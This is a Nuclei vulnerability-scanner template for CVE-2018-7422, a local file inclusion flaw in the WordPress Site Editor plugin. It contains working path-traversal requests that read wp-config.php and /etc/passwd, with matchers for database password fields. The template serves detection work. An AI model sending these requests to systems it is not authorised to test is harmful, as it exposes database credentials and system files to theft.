nuclei-templates/cves/2018/CVE-2018-7422.yaml

35 lines
1.2 KiB
YAML

id: CVE-2018-7422
info:
name: WordPress Site Editor Plugin LFI
author: LuskaBol,0x240x23elu
severity: high
description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
reference:
- https://www.exploit-db.com/exploits/44340
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-7422
cwe-id: CWE-22,CWE-829
tags: cve,cve2018,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
- "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
matchers-condition: or
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: regex
regex:
- "root:.*:0:0:"
part: body